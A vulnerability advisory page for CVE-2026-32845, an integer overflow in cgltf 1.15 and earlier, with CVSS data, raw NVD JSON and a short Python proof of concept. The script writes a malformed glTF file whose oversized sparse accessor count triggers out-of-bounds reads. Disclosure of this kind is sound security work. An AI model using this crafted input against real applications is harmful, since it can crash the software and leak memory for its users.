Security Vulnerability Report
中文
CVE-2026-32845 CVSS 8.4 HIGH

CVE-2026-32845

Published: 2026-03-23 16:16:49
Last Modified: 2026-05-01 15:21:32
Source: [email protected]

Description

cgltf version 1.15 and prior contain an integer overflow vulnerability in the cgltf_validate() function when validating sparse accessors that allows attackers to trigger out-of-bounds reads by supplying crafted glTF/GLB input files with attacker-controlled size values. Attackers can exploit unchecked arithmetic operations in sparse accessor validation to cause heap buffer over-reads in cgltf_calc_index_bound(), resulting in denial of service crashes and potential memory disclosure.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

cgltf <= 1.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import json # This script generates a malformed glTF JSON structure to trigger the integer overflow. # The vulnerability exists in cgltf_validate() when checking sparse accessors. # Construct a minimal glTF structure with a sparse accessor # containing attacker-controlled size values designed to overflow. poc_data = { "asset": {"version": "2.0"}, "meshes": [{ "primitives": [{ "attributes": {"POSITION": 0}, "indices": 0 }] }], "accessors": [{ "bufferView": 0, "componentType": 5123, # UNSIGNED_SHORT "count": 10, "type": "SCALAR", "sparse": { "count": 4294967294, # Large value to trigger overflow "indices": { "bufferView": 0, "byteOffset": 0, "componentType": 5123 }, "values": { "bufferView": 0, "byteOffset": 0 } } }], "bufferViews": [{ "buffer": 0, "byteLength": 20 }], "buffers": [{ "byteLength": 20, "uri": "data:application/octet-stream;base64,AAAAAAAAAAAAAAAA" }] } # Save to file with open("malformed.gltf", "w") as f: json.dump(poc_data, f) print("Malformed glTF file generated: malformed.gltf") # Load this file using a vulnerable version of cgltf to trigger the crash.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32845", "sourceIdentifier": "[email protected]", "published": "2026-03-23T16:16:48.583", "lastModified": "2026-05-01T15:21:32.393", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "cgltf version 1.15 and prior contain an integer overflow vulnerability in the cgltf_validate() function when validating sparse accessors that allows attackers to trigger out-of-bounds reads by supplying crafted glTF/GLB input files with attacker-controlled size values. Attackers can exploit unchecked arithmetic operations in sparse accessor validation to cause heap buffer over-reads in cgltf_calc_index_bound(), resulting in denial of service crashes and potential memory disclosure."}, {"lang": "es", "value": "La versión 1.15 y anteriores de cgltf contienen una vulnerabilidad de desbordamiento de entero en la función cgltf_validate() al validar accesores dispersos que permite a los atacantes provocar lecturas fuera de límites al proporcionar archivos de entrada glTF/GLB manipulados con valores de tamaño controlados por el atacante. Los atacantes pueden explotar operaciones aritméticas no verificadas en la validación de accesores dispersos para causar sobrelecturas de búfer de pila en cgltf_calc_index_bound(), lo que resulta en caídas por denegación de servicio y posible divulgación de memoria."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "references": [{"url": "https://github.com/jkuhlmann/cgltf/issues/287", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/jkuhlmann-cgltf-sparse-accessor-validation-integer-overflow", "source": "[email protected]"}, {"url": "https://github.com/jkuhlmann/cgltf/issues/287", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.